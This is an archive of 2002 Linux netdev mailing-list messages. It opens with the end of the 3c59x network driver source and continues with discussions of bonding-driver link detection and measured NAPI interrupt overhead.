(vortex_debug > 0) { printk(KERN_INFO PFX "Wake-on-LAN functions disabled\n"); } return; /* Power up on: 1==Downloaded Filter, 2==Magic Packets, 4==Link Status. */ EL3WINDOW(7); outw(2, ioaddr + 0x0c); /* The RxFilter must accept the WOL frames. */ outw(SetRxFilter|RxStation|RxMulticast|RxBroadcast, ioaddr + EL3_CMD); outw(RxEnable, ioaddr + EL3_CMD); /* Change the power state to D3; RxEnable doesn't take effect. */ pci_write_config_word(vp->pdev, 0xe0, 0x8103); } static void __devexit vortex_remove_one (struct pci_dev *pdev) { struct net_device *dev = pdev->driver_data; struct vortex_private *vp; if (!dev) { printk("vortex_remove_one called for EISA device!\n"); BUG(); } vp = (void *)(dev->priv); /* No need to check MOD_IN_USE, as sys_delete_module() checks.
*/ /* AKPM: FIXME: we should have * if (vp->cb_fn_base) iounmap(vp->cb_fn_base); * here */ unregister_netdev(dev); outw(TotalReset, dev->base_addr + EL3_CMD); release_region(dev->base_addr, vp->io_size); kfree(dev); } static struct pci_driver vortex_driver = { name: "3c575_cb", probe: vortex_init_one, remove: vortex_remove_one, suspend: vortex_suspend, resume: vortex_resume, id_table: vortex_pci_tbl, }; static int vortex_have_pci = 0; static int vortex_have_eisa = 0; static int __init vortex_init (void) { int rc; rc = pci_module_init (&vortex_driver); if (rc < 0) goto out; if (rc >= 0) /* AKPM: had "> 0" */ vortex_have_pci = 1; rc = vortex_eisa_init (); if (rc < 0) goto out; if (rc > 0) vortex_have_eisa = 1; out: return rc; } static void __exit vortex_eisa_cleanup (void) { struct net_device *dev, *tmp; struct vortex_private *vp; long ioaddr; dev = root_vortex_eisa_dev; while (dev) { vp = dev->priv; ioaddr = dev->base_addr; unregister_netdev (dev); outw (TotalReset, ioaddr + EL3_CMD); release_region (ioaddr, VORTEX_TOTAL_SIZE); tmp = dev; dev = vp->next_module; kfree (tmp); } } static void __exit vortex_cleanup (void) { if (vortex_have_pci) pci_unregister_driver (&vortex_driver); if (vortex_have_eisa) vortex_eisa_cleanup (); } module_init(vortex_init); module_exit(vortex_cleanup); /* * Local variables: * compile-command: "gcc -DMODULE -D__KERNEL__ -Wall -Wstrict-prototypes -O6 -c 3c59x.c `[ -f /usr/include/linux/modversions.h ] && echo -DMODVERSIONS`" * cardbus-compile-command: "gcc -DCONFIG_HOTPLUG -DMODULE -D__KERNEL__ -Wall -Wstrict-prototypes -O6 -c 3c59x.c -o 3c575_cb.o -I/usr/src/linux/pcmcia-cs-3.0.9/include/" * c-indent-level: 4 * c-basic-offset: 4 * tab-width: 4 * End: */ --------------E037F6CAA8E998053B25BA1E-- From Andrew.Morton@digeo.com Tue Sep 17 13:25:21 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 13:25:22 -0700 (PDT) Received: from packet.digeo.com (packet.digeo.com [12.110.80.53]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id 
g8HKPKtG025444 for ; Tue, 17 Sep 2002 13:25:20 -0700 Received: from digeo-nav01.digeo.com (digeo-nav01.digeo.com [192.168.1.233]) by packet.digeo.com (8.9.3+Sun/8.9.3) with SMTP id NAA28817 for ; Tue, 17 Sep 2002 13:30:15 -0700 (PDT) Received: from schumi.digeo.com ([192.168.1.205]) by digeo-nav01.digeo.com (NAVGW 2.5.2.9) with SMTP id M2002091713341712177 ; Tue, 17 Sep 2002 13:34:17 -0700 Received: from pao-ex01.pao.digeo.com ([172.17.144.34]) by schumi.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 13:30:15 -0700 Received: from digeo.com ([172.17.140.150]) by pao-ex01.pao.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 13:30:14 -0700 Message-ID: <3D8790D6.68927887@digeo.com> Date: Tue, 17 Sep 2002 13:30:14 -0700 From: Andrew Morton X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.19-pre4 i686) X-Accept-Language: en MIME-Version: 1.0 To: Jeff Garzik CC: "Cureington, Tony" , Pascal Brisset , bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPUload References: <72A87F7160C0994D8C5A36E2FDC227F502B3E70D@txnexc01.americas.cpqcorp.net> <3D878675.3000403@mandrakesoft.com> <3D878841.EB580DE9@digeo.com> <3D878C56.2070400@mandrakesoft.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 17 Sep 2002 20:30:14.0040 (UTC) FILETIME=[06FA6980:01C25E89] X-archive-position: 229 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@digeo.com Precedence: bulk X-list: netdev (bonding-devel didn't like the size of the attachment. It's at http://www.zip.com.au/~akpm/3c59x.c-netif) Jeff Garzik wrote: > > Andrew Morton wrote: > > Jeff Garzik wrote: > > > >>... > >>Also, a further question: do you have access to the slave struct > >>net_device? If so, just test netif_carrier_ok(slave_dev) and avoid all > >>that ioctl calling if it returns non-zero. 
> > > > > > Make that "avoid all that ioctl calling from interrupt context", which > > is a bug. Of the box-killing variety ;) > > Indeed. /me looks at the bond_check_dev_link callers more closely and > shudders. > > That wants fixing... > > Note that netif_carrier_ok() can indeed be checked in interrupt context. > And if someone wants to send me patches converting more drivers to use > netif_carrier_{on,off}, I would be very happy :) That would be best. I'm so slack. I received the below two years ago; Nelson has added netif_carrier_foo support to 3c59x.c. As Jeff says: patches solicited. -------- Original Message -------- Subject: Re: netlink Date: Wed, 14 Jun 2000 11:19:33 +0800 (SST) From: Nelson To: Andrew Morton References: <394610FF.4052CEAA@uow.edu.au> hi Andrew, The modified 3c59x.c is attached. for your easy reference, these lines in the attached driver were modified: 69-72: notes on what was added 121-123: defined the expiry time of the vortex_timer as TX_EXPIRE. i have set the value as 1*HZ. the original value should be 60*HZ. you may set to any value you feel is good ;p you are right about the 1 sec part since reading the MII management registers is time consuming. 1122: used TX_EXPIRE instead 1335, 1399, 1428: set next_tick to TX_EXPIRE 1351: added calls to netif_carrier_on() 1356: added calls to netif_carrier_off() 1367-1371: added checking of link state do let me know if there are any discrepancies. thanx.
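The timer-driven carrier update described in the note above can be sketched as a small user-space model. This is only an illustration under stated assumptions, not the code from the attached driver: struct fake_netdev, fake_carrier_set(), fake_media_timer(), fake_link_ok() and fake_link_demo() are hypothetical names, and the BMSR value is passed in directly where a driver would read MII register 1 through something like mdio_read(). The only detail taken from the thread is that 0x0004 (BMSR_LSTATUS) is the link-established bit.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define BMSR_LSTATUS 0x0004   /* link-status bit of MII register 1 (BMSR) */

/* Hypothetical stand-in for struct net_device: only the carrier state. */
struct fake_netdev {
    bool carrier_ok;
    unsigned int carrier_changes;
};

/* Models netif_carrier_on()/netif_carrier_off(): record the new state
 * and count only real transitions. */
static void fake_carrier_set(struct fake_netdev *dev, bool up)
{
    if (dev->carrier_ok != up) {
        dev->carrier_ok = up;
        dev->carrier_changes++;
    }
}

/* What a periodic media timer might do with a freshly read BMSR value. */
static void fake_media_timer(struct fake_netdev *dev, uint16_t bmsr)
{
    fake_carrier_set(dev, (bmsr & BMSR_LSTATUS) != 0);
}

/* Cheap link query: 1 for link up, 0 for link down, never the raw
 * status word and never an MII access. */
static int fake_link_ok(const struct fake_netdev *dev)
{
    return dev->carrier_ok ? 1 : 0;
}

static void fake_link_demo(void)
{
    struct fake_netdev dev = { false, 0 };

    fake_media_timer(&dev, 0x7809);   /* nonzero BMSR, link bit clear */
    assert(fake_link_ok(&dev) == 0);

    fake_media_timer(&dev, 0x782d);   /* link bit set */
    assert(fake_link_ok(&dev) == 1);
}
```

The design point is that the slow MII read happens only in the timer, so a caller that merely wants the link state (for example from interrupt context) can look at the cached flag instead.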
From fubar@us.ibm.com Tue Sep 17 13:33:05 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 13:33:09 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HKX3tG025835 for ; Tue, 17 Sep 2002 13:33:04 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e1.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g8HKbfEG202420; Tue, 17 Sep 2002 16:37:41 -0400 Received: from d03nm035.boulder.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by northrelay02.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g8HKba4I070688; Tue, 17 Sep 2002 16:37:36 -0400 From: "Jay Vosburgh" Importance: Normal Sensitivity: Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPUload To: Jeff Garzik Cc: Andrew Morton , "Cureington, Tony" , Pascal Brisset , bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com X-Mailer: Lotus Notes Release 5.0.7 March 21, 2001 Message-ID: Date: Tue, 17 Sep 2002 13:37:35 -0700 X-MIMETrack: Serialize by Router on D03NM035/03/M/IBM(Release 5.0.10 |March 22, 2002) at 09/17/2002 02:37:39 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii X-archive-position: 230 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: fubar@us.ibm.com Precedence: bulk X-list: netdev Ok. I'll whip up a patch either this afternoon or tomorrow (gotta download 2.4.20-pre7, no broadband here) that de-uglifies the badness around magic number 4 and includes one of the ioctl in a context patches (which may not fix everything properly, but should be better than what's there now). I'm not sure about throwing in a test of netif_carrier_ok() just for good measure. It looks like if the driver does not support netif_carrier_xxx, then the default will be carrier on (because the bit is clear in dev->state). 
So, we can ask, and if it tells us the carrier is down, that's probably reliable, but if it says carrier is up, that may or may not be true. Or am I missing an initialization in there somewhere? And, actually, the bonding driver is already using netif_carrier_ok() as part of the IS_UP() macro defined in bonding.c. It's just not used during the MII test. -J Jeff Garzik @lists.sourceforge.net on 09/17/2002 01:11:02 PM Sent by: bonding-devel-admin@lists.sourceforge.net To: Andrew Morton cc: "Cureington, Tony" , Pascal Brisset , bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPUload Andrew Morton wrote: > Jeff Garzik wrote: > >>... >>Also, a further question: do you have access to the slave struct >>net_device? If so, just test netif_carrier_ok(slave_dev) and avoid all >>that ioctl calling if it returns non-zero. > > > Make that "avoid all that ioctl calling from interrupt context", which > is a bug. Of the box-killing variety ;) Indeed. /me looks at the bond_check_dev_link callers more closely and shudders. That wants fixing... Note that netif_carrier_ok() can indeed be checked in interrupt context. And if someone wants to send me patches converting more drivers to use netif_carrier_{on,off}, I would be very happy :)
_______________________________________________ Bonding-devel mailing list Bonding-devel@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/bonding-devel From jgarzik@mandrakesoft.com Tue Sep 17 13:40:05 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 13:40:10 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HKe4tG026234 for ; Tue, 17 Sep 2002 13:40:05 -0700 Received: from c-24-98-61-134.atl.client2.attbi.com ([24.98.61.134] helo=mandrakesoft.com) by www.linux.org.uk with esmtp (Exim 3.33 #5) id 17rOIm-0004hX-00; Tue, 17 Sep 2002 20:46:28 +0100 Message-ID: <3D878675.3000403@mandrakesoft.com> Date: Tue, 17 Sep 2002 15:45:57 -0400 From: Jeff Garzik Organization: MandrakeSoft User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "Cureington, Tony" CC: Andrew Morton , Pascal Brisset , bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPU load References: <72A87F7160C0994D8C5A36E2FDC227F502B3E70D@txnexc01.americas.cpqcorp.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 231 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@mandrakesoft.com Precedence: bulk X-list: netdev Cureington, Tony wrote: > /* Yes, the mii is overlaid on the ifreq.ifr_ifru */ > mii = (struct mii_ioctl_data *)&ifr.ifr_data; > if (ioctl(dev, &ifr, SIOCGMIIPHY) != 0) { > return MII_LINK_READY; /* can't tell */ > } > > mii->reg_num = 1; > if (ioctl(dev, &ifr, SIOCGMIIREG) == 0) { > /* > * mii->val_out contains MII reg 1, BMSR > * 0x0004 means link established > */ > return mii->val_out; > } Speaking of bonding, I wonder about
the above code -- why do you return mii->val_out directly? AFAICS you should test BMSR_LSTATUS (a.k.a. 0x0004) and return MII_LINK_READY or zero -- not a bunch of random bits. The status word can certainly be non-zero even when link is absent. Also, a further question: do you have access to the slave struct net_device? If so, just test netif_carrier_ok(slave_dev) and avoid all that ioctl calling if it returns non-zero. Jeff From Andrew.Morton@digeo.com Tue Sep 17 14:30:15 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 14:30:31 -0700 (PDT) Received: from packet.digeo.com (packet.digeo.com [12.110.80.53]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HLUDtG027084 for ; Tue, 17 Sep 2002 14:30:14 -0700 Received: from digeo-nav01.digeo.com (digeo-nav01.digeo.com [192.168.1.233]) by packet.digeo.com (8.9.3+Sun/8.9.3) with SMTP id OAA01547 for ; Tue, 17 Sep 2002 14:35:08 -0700 (PDT) Received: from schumi.digeo.com ([192.168.1.205]) by digeo-nav01.digeo.com (NAVGW 2.5.2.9) with SMTP id M2002091714391131459 for ; Tue, 17 Sep 2002 14:39:11 -0700 Received: from pao-ex01.pao.digeo.com ([172.17.144.34]) by schumi.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 14:35:08 -0700 Received: from digeo.com ([172.17.140.150]) by pao-ex01.pao.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 14:35:07 -0700 Message-ID: <3D87A00B.F78DE643@digeo.com> Date: Tue, 17 Sep 2002 14:35:07 -0700 From: Andrew Morton X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.19-pre4 i686) X-Accept-Language: en MIME-Version: 1.0 To: "netdev@oss.sgi.com" Subject: [Fwd: Info: NAPI performance at "low" loads] Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 17 Sep 2002 21:35:07.0615 (UTC) FILETIME=[17BACEF0:01C25E92] X-archive-position: 232 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@digeo.com Precedence: bulk X-list: netdev 
Manfred typo'ed the email address... -------- Original Message -------- Subject: Info: NAPI performance at "low" loads Date: Tue, 17 Sep 2002 21:53:03 +0200 From: Manfred Spraul To: linux-netdev@oss.sgi.com, linux-kernel@vger.kernel.org NAPI network drivers mask the rx interrupts in their interrupt handler, and reenable them in dev->poll(). In the worst case, that happens for every packet. I've tried to measure the overhead of that operation. The cpu time needed to receive 50k packets/sec: without NAPI: 53.7 % with NAPI: 59.9 % 50k packets/sec is the limit for NAPI, at higher packet rates the forced mitigation kicks in and every interrupt receives more than one packet. The cpu time was measured by busy-looping in user space, the numbers should be accurate to less than 1 %. Summary: with my setup, the overhead is around 11 %. Could someone try to reproduce my results? Sender: # sendpkt 1 <10..50, to get a good packet rate> Receiver: $ loadtest Please disable any interrupt mitigation features of your nic, otherwise the mitigation will dramatically change the needed cpu time. The sender sends ICMP echo reply packets, evenly spaced by "memset(,,n*512)" between the syscalls. The cpu load was measured with a user space app that calls "memset(,,16384)" in a tight loop, and reports the number of loops per second. I've used a patched tulip driver, the current NAPI driver contains a loop that severely slows down the nic under such loads. The patch and my test apps are at http://www.q-ag.de/~manfred/loadtest hardware setup: Duron 700, VIA KT 133 no IO APIC, i.e. slow 8259 XT PIC. Accton tulip clone, ADMtek comet.
crossover cable Sender: Celeron 1.13 GHz, rtl8139 -- Manfred - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/ From Andrew.Morton@digeo.com Tue Sep 17 14:40:18 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 14:40:22 -0700 (PDT) Received: from packet.digeo.com (packet.digeo.com [12.110.80.53]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HLeItG027650 for ; Tue, 17 Sep 2002 14:40:18 -0700 Received: from digeo-nav01.digeo.com (digeo-nav01.digeo.com [192.168.1.233]) by packet.digeo.com (8.9.3+Sun/8.9.3) with SMTP id OAA01818 for ; Tue, 17 Sep 2002 14:45:09 -0700 (PDT) Received: from schumi.digeo.com ([192.168.1.205]) by digeo-nav01.digeo.com (NAVGW 2.5.2.9) with SMTP id M2002091714491209543 ; Tue, 17 Sep 2002 14:49:12 -0700 Received: from pao-ex01.pao.digeo.com ([172.17.144.34]) by schumi.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 14:45:09 -0700 Received: from digeo.com ([172.17.140.150]) by pao-ex01.pao.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 14:45:08 -0700 Message-ID: <3D87A264.8D5F3AD2@digeo.com> Date: Tue, 17 Sep 2002 14:45:08 -0700 From: Andrew Morton X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.19-pre4 i686) X-Accept-Language: en MIME-Version: 1.0 To: "David S. 
Miller" CC: manfred@colorfullife.com, "netdev@oss.sgi.com" , linux-kernel@vger.kernel.org Subject: Re: Info: NAPI performance at "low" loads References: <3D879F59.6BDF9443@digeo.com> <20020917.142635.114214508.davem@redhat.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 17 Sep 2002 21:45:08.0045 (UTC) FILETIME=[7D9D27D0:01C25E93] X-archive-position: 233 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@digeo.com Precedence: bulk X-list: netdev "David S. Miller" wrote: > > From: Andrew Morton > Date: Tue, 17 Sep 2002 14:32:09 -0700 > > There is a similar background loadtester at > http://www.zip.com.au/~akpm/linux/#zc . > > It's fairly fancy - I wrote it for measuring networking > efficiency. It doesn't seem to have any PCisms.... > > Thanks I'll check it out, but meanwhile I hacked up sparc > specific assembler for manfred's code :-) > > (I measured similar regression using an ancient NAPIfied > 3c59x a long time ago). > > Well, it is due to the same problems manfred saw initially, > namely just a crappy or buggy NAPI driver implementation. :-) It was due to additional inl()'s and outl()'s in the driver fastpath. Testcase was netperf Tx and Rx. Just TCP over 100bT. AFAIK, this overhead is intrinsic to NAPI. Not to say that its costs outweigh its benefits, but it's just there. If someone wants to point me at all the bits and pieces to get a NAPIfied 3c59x working on 2.5.current I'll retest, and generate some instruction-level oprofiles. 
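Two figures are quoted in this thread for the same measurement, "around 11 %" and "6%". They are consistent if the first is read as the relative increase in CPU time and the second as the difference in percentage points. A minimal arithmetic sketch, assuming only the two reported values (53.7 % without NAPI, 59.9 % with NAPI); the function names are illustrative:

```c
#include <assert.h>

/* CPU-time figures reported in this thread for 50k packets/sec. */
static const double CPU_PCT_NO_NAPI = 53.7;
static const double CPU_PCT_NAPI    = 59.9;

/* Difference in percentage points. */
static double overhead_points(double base, double with_napi)
{
    return with_napi - base;
}

/* Increase relative to the non-NAPI baseline, in percent. */
static double overhead_relative_pct(double base, double with_napi)
{
    return (with_napi - base) / base * 100.0;
}

static void overhead_demo(void)
{
    double pts = overhead_points(CPU_PCT_NO_NAPI, CPU_PCT_NAPI);
    double rel = overhead_relative_pct(CPU_PCT_NO_NAPI, CPU_PCT_NAPI);

    assert(pts > 6.1 && pts < 6.3);     /* about 6.2 points */
    assert(rel > 11.4 && rel < 11.7);   /* about 11.5 percent */
}
```

Since the measurement is stated to be accurate to less than 1 %, both readings are well outside the noise.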
From davem@redhat.com Tue Sep 17 14:43:53 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 14:43:55 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HLhqtG028004 for ; Tue, 17 Sep 2002 14:43:52 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id OAA16752; Tue, 17 Sep 2002 14:39:47 -0700 Date: Tue, 17 Sep 2002 14:39:47 -0700 (PDT) Message-Id: <20020917.143947.07361352.davem@redhat.com> To: akpm@digeo.com Cc: manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Info: NAPI performance at "low" loads From: "David S. Miller" In-Reply-To: <3D87A264.8D5F3AD2@digeo.com> References: <3D879F59.6BDF9443@digeo.com> <20020917.142635.114214508.davem@redhat.com> <3D87A264.8D5F3AD2@digeo.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 234 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Andrew Morton Date: Tue, 17 Sep 2002 14:45:08 -0700 "David S. Miller" wrote: > Well, it is due to the same problems manfred saw initially, > namely just a crappy or buggy NAPI driver implementation. :-) It was due to additional inl()'s and outl()'s in the driver fastpath. How many? Did the implementation cache the register value in a software state word or did it read the register each time to write the IRQ masking bits back? It is issues like this that make me say "crappy or buggy NAPI implementation" Any driver should be able to get the NAPI overhead to max out at 2 PIOs per packet. 
And if the performance is really concerning, perhaps add an option to use MEM space in the 3c59x driver too, IO instructions are constant cost regardless of how fast the PCI bus being used is :-) From jgarzik@mandrakesoft.com Tue Sep 17 14:50:16 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 14:50:18 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HLoFtG028388 for ; Tue, 17 Sep 2002 14:50:15 -0700 Received: from c-24-98-61-134.atl.client2.attbi.com ([24.98.61.134] helo=mandrakesoft.com) by www.linux.org.uk with esmtp (Exim 3.33 #5) id 17rQJO-0007IY-00; Tue, 17 Sep 2002 22:55:14 +0100 Message-ID: <3D87A4A2.6050403@mandrakesoft.com> Date: Tue, 17 Sep 2002 17:54:42 -0400 From: Jeff Garzik Organization: MandrakeSoft User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: akpm@digeo.com, manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Info: NAPI performance at "low" loads References: <3D879F59.6BDF9443@digeo.com> <20020917.142635.114214508.davem@redhat.com> <3D87A264.8D5F3AD2@digeo.com> <20020917.143947.07361352.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 235 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@mandrakesoft.com Precedence: bulk X-list: netdev David S. Miller wrote: > Any driver should be able to get the NAPI overhead to max out at > 2 PIOs per packet. Just to pick nits... my example went from 2 or 3 IOs [depending on the presence/absence of a work loop] to 6 IOs. Feel free to re-read my message and point out where an IO can be eliminated... 
Jeff From davem@redhat.com Tue Sep 17 14:53:20 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 14:53:25 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HLrJtG028738 for ; Tue, 17 Sep 2002 14:53:20 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id OAA16810; Tue, 17 Sep 2002 14:49:12 -0700 Date: Tue, 17 Sep 2002 14:49:11 -0700 (PDT) Message-Id: <20020917.144911.43656989.davem@redhat.com> To: jgarzik@mandrakesoft.com Cc: akpm@digeo.com, manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Info: NAPI performance at "low" loads From: "David S. Miller" In-Reply-To: <3D87A4A2.6050403@mandrakesoft.com> References: <3D87A264.8D5F3AD2@digeo.com> <20020917.143947.07361352.davem@redhat.com> <3D87A4A2.6050403@mandrakesoft.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 236 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Jeff Garzik Date: Tue, 17 Sep 2002 17:54:42 -0400 David S. Miller wrote: > Any driver should be able to get the NAPI overhead to max out at > 2 PIOs per packet. Just to pick nits... my example went from 2 or 3 IOs [depending on the presence/absence of a work loop] to 6 IOs. I mean "2 extra PIOs" not "2 total PIOs". I think it's doable for just about every driver, even tg3 with its weird semaphore scheme takes 2 extra PIOs worst case with NAPI. The semaphore I have to ACK at hw IRQ time anyway, and since I keep a software copy of the IRQ masking register, mask and unmask are each one PIO.
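The "software copy of the IRQ masking register" argument can be illustrated with a small user-space model that only counts port accesses. Everything here is a sketch under assumptions: struct fake_nic, fake_inw(), fake_outw(), the RX_INTR bit value and the function names are hypothetical and do not come from tg3 or 3c59x. The model contrasts a read-modify-write mask update with a cached one.

```c
#include <assert.h>
#include <stdint.h>

#define RX_INTR 0x0010u   /* hypothetical "Rx interrupt enable" bit */

/* Hypothetical NIC model: one mask register plus port-I/O counters. */
struct fake_nic {
    uint16_t hw_mask;        /* value held by the simulated register */
    uint16_t intr_enable;    /* software copy kept by the driver */
    unsigned int pio_reads;
    unsigned int pio_writes;
};

static uint16_t fake_inw(struct fake_nic *nic)
{
    nic->pio_reads++;
    return nic->hw_mask;
}

static void fake_outw(struct fake_nic *nic, uint16_t val)
{
    nic->pio_writes++;
    nic->hw_mask = val;
}

/* Read-modify-write: one read plus one write per mask change. */
static void mask_rx_rmw(struct fake_nic *nic)
{
    fake_outw(nic, (uint16_t)(fake_inw(nic) & ~RX_INTR));
}

/* Cached: update the software copy, then issue a single write. */
static void mask_rx_cached(struct fake_nic *nic)
{
    nic->intr_enable &= (uint16_t)~RX_INTR;
    fake_outw(nic, nic->intr_enable);
}

static void unmask_rx_cached(struct fake_nic *nic)
{
    nic->intr_enable |= RX_INTR;
    fake_outw(nic, nic->intr_enable);
}

/* One interrupt-then-poll cycle with the cached mask: two writes, no reads. */
static void cached_cycle_demo(void)
{
    struct fake_nic nic = { 0x00ff, 0x00ff, 0, 0 };

    mask_rx_cached(&nic);     /* in the interrupt handler */
    unmask_rx_cached(&nic);   /* at the end of the poll routine */

    assert(nic.pio_reads == 0 && nic.pio_writes == 2);
    assert(nic.hw_mask == 0x00ff);
}
```

With the cached copy, a worst-case cycle of one packet per interrupt costs the two extra port writes mentioned above; the read-modify-write variant would add a port read to each of them.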
From Andrew.Morton@digeo.com Tue Sep 17 14:53:58 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 14:54:00 -0700 (PDT) Received: from packet.digeo.com (packet.digeo.com [12.110.80.53]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HLrwtG028964 for ; Tue, 17 Sep 2002 14:53:58 -0700 Received: from digeo-nav01.digeo.com (digeo-nav01.digeo.com [192.168.1.233]) by packet.digeo.com (8.9.3+Sun/8.9.3) with SMTP id OAA02194 for ; Tue, 17 Sep 2002 14:58:53 -0700 (PDT) Received: from schumi.digeo.com ([192.168.1.205]) by digeo-nav01.digeo.com (NAVGW 2.5.2.9) with SMTP id M2002091715025610689 ; Tue, 17 Sep 2002 15:02:56 -0700 Received: from pao-ex01.pao.digeo.com ([172.17.144.34]) by schumi.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 14:58:53 -0700 Received: from digeo.com ([172.17.140.150]) by pao-ex01.pao.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 14:58:52 -0700 Message-ID: <3D87A59C.410FFE3E@digeo.com> Date: Tue, 17 Sep 2002 14:58:52 -0700 From: Andrew Morton X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.19-pre4 i686) X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Info: NAPI performance at "low" loads References: <3D87A264.8D5F3AD2@digeo.com> <20020917.143947.07361352.davem@redhat.com> Content-Type: text/plain; charset=us-ascii 